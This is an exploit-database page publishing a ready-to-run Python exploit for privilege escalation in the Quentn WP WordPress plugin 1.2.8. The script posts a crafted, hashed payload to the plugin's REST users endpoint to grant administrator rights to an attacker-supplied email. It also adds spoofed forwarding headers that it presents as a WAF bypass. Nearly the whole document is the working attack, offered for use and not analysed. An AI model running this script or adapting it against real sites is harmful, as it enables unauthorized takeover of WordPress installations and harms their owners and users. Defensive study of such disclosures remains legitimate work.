WordPress Quentn WP 1.2.8 Privilege Escalation

2025.09.30
Credit: Nxploited
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/env python3 # -*- coding: utf-8 -*- import argparse import base64 import hashlib import json import random import requests import time import urllib3 from urllib.parse import urlparse def print_banner(): banner = r""" @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@! @@@ !@@ @@! @@@ !@@ !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ !@! @!@ !@! !@! @!@ !@! !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@!!@ !!@!!@!! !!@@!! !!@!!@!! !!@@!@! !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!@!@! !!@!!! @!!@!!! !!@!!! @!!@!!!! :!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !!! !:! !!! !:! !:! :!: ::!!:! :!: :!: :!: !:! :!: !:! :!: !:! !:! !:! :!: !:! ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: :::: ::::: :: :::: :: ::::: :: :::: ::: :: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : : : : : : : :: : : : : : :: : : """ print(banner) print("Nxploited | Khaled Alenazi\n") def gen_headers(cookie=None, add_extra=False): agents = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited", "Mozilla/5.0 (X11; Linux x86_64) Nxploited", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Nxploited", "Nxploited/1.0 (compatible;)", "Nxploited/2.0 (Special Edition)", "Mozilla/5.0 Nxploited", "Nxploited-Bypass/7.0", "Nxploited-Advanced/1337" ] h = { "User-Agent": random.choice(agents) + " | Nxploited", "X-Nxploited": "Nxploited", "Content-Type": "application/json", "Accept-Encoding": "gzip, deflate, br", "Connection": "close" } if add_extra: h["Referer"] = "https://google.com/Nxploited" h["X-Forwarded-For"] = "127.0.0.1" h["Forwarded"] = "for=127.0.0.1" h["Nxploited-Skip"] = "true" h["Accept"] = "*/*" if cookie: h["Cookie"] = cookie return h def build_inner_json(email, fname, lname, role): return { "data": { "users": [ { "email": email, "first_name": fname, "last_name": lname } ], "roles": { "add_roles": [role] }, "notify": False } } def encode_payload(inner_json): return base64.b64encode(json.dumps(inner_json).encode()).decode() def gen_vu(): return int(time.time()) + random.randint(1800, 3700) def build_hash(b64_data, vu, key): raw = f"{b64_data}{vu}{key}" if key else f"{b64_data}{vu}" return hashlib.sha256(raw.encode()).hexdigest() def build_payload(email, fname, lname, role, key): inner_json = build_inner_json(email, fname, lname, role) b64_data = encode_payload(inner_json) vu = gen_vu() hash_val = build_hash(b64_data, vu, key) return { "data": b64_data, "vu": vu, "hash": hash_val } def normalize_url(url): parsed = urlparse(url, "http") scheme = parsed.scheme if parsed.scheme in ["http", "https"] else "http" netloc = parsed.netloc if parsed.netloc else parsed.path return f"{scheme}://{netloc.rstrip('/')}/wp-json/quentn/api/v1/users" def send_exploit(url, payload, headers, proxies=None, verify_ssl=False): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) try: r = requests.post(url, headers=headers, data=json.dumps(payload), timeout=20, proxies=proxies or {}, verify=verify_ssl) return r except Exception as e: return e def is_success(response): if isinstance(response, Exception): return False, f"Request Error: {response}" if "Data Successfully Updated" in response.text: return True, "Exploit Success By | Nxploited" return False, f"{response.status_code} | {response.text[:256]}" def main(): print_banner() parser = argparse.ArgumentParser(description="CVE-2025-39596 | Nxploited") parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL") parser.add_argument("-e", "--email", required=True, help="Email for new admin account") parser.add_argument("-f", "--fname", default="Pwn", help="First name") parser.add_argument("-l", "--lname", default="Admin", help="Last name") parser.add_argument("-r", "--role", default="administrator", help="Role to assign") parser.add_argument("-k", "--key", default="", help="Quentn API key if known") parser.add_argument("--cookie", default=None, help="Add cookie for authenticated bypass if needed") parser.add_argument("--proxy", default=None, help="Proxy (ex: http://127.0.0.1:8080)") parser.add_argument("--skip-ssl", action="store_true", help="Skip SSL verification") parser.add_argument("--extra", action="store_true", help="Add extra headers (bypass/WAF/etc)") args = parser.parse_args() endpoint = normalize_url(args.url) payload = build_payload(args.email, args.fname, args.lname, args.role, args.key) proxies = {"http": args.proxy, "https": args.proxy} if args.proxy else None headers = gen_headers(args.cookie, args.extra) response = send_exploit(endpoint, payload, headers, proxies, not args.skip_ssl) ok, msg = is_success(response) print(msg) if __name__ == "__main__": main()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top